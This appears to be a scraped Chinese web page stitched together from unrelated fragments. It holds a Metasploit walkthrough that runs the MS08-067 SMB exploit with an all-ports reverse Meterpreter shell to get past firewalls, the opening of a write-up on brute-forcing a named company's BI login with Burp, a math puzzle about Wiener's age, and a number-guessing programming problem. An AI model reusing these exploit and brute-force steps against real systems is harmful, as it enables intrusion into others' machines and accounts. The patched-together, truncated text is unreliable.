很多公司在防火牆上僅僅開放個別埠
並將其餘埠一律關閉
我們可以猜測目標443埠沒有關閉,同樣還有ftp,telnet,ssh等埠
使用以下方式可對所有埠一一嘗試,尋找所有可用埠
use windows/smb/ms08_067_netapi
set lhost 192.168
.43.1
set rhost 192.168
.43.135
set target 4
set payload windows/meterpreter/reverse_tcp_allports
exploit -j
攻擊成功之後,可以輸入session -l -v檢視每乙個meterpreter會話
使用session -l 1檢視id為1的會話並與其互動,也就是獲得其shell
暴力猜解突破夢潔家紡BIS系統
目標 夢潔家紡第三方應用 bi系統 爆破理由 1 鑑於前面兩條漏洞,說明密碼強度不夠 2 登入介面無驗證碼 3 暫未發現登入錯誤次數限制。登陸介面有兩種登入方式 管理員和使用者 區別在於登入時是否勾選 管理員登入 開啟burp,先嘗試管理員登入 勾選 管理員登入 分別掛上使用者名稱和密碼檔案,不一會...
題目標題 猜年齡
美國數學家維納 n.wiener 智力早熟,11歲就上了大學。他曾在1935 1936年應邀來中國清華大學講學。一次,他參加某個重要會議,年輕的臉孔引人注目。於是有人詢問他的年齡,他回答說 我年齡的立方是個4位數。我年齡的4次方是個6位數。這10個數字正好包含了從0到9這10個數字,每個都恰好出現1...
暴力 猜數字(hdu1172)
題目描述 猜數字遊戲是gameboy最喜歡的遊戲之一。遊戲的規則是這樣的 計算機隨機產生乙個四位數,然後玩家猜這個四位數是什麼。每猜乙個數,計算機都會告訴玩家猜對幾個數字,其中有幾個數字在正確的位置上。比如計算機隨機產生的數字為1122。如果玩家猜1234,因為1,2這兩個數字同時存在於這兩個數中,...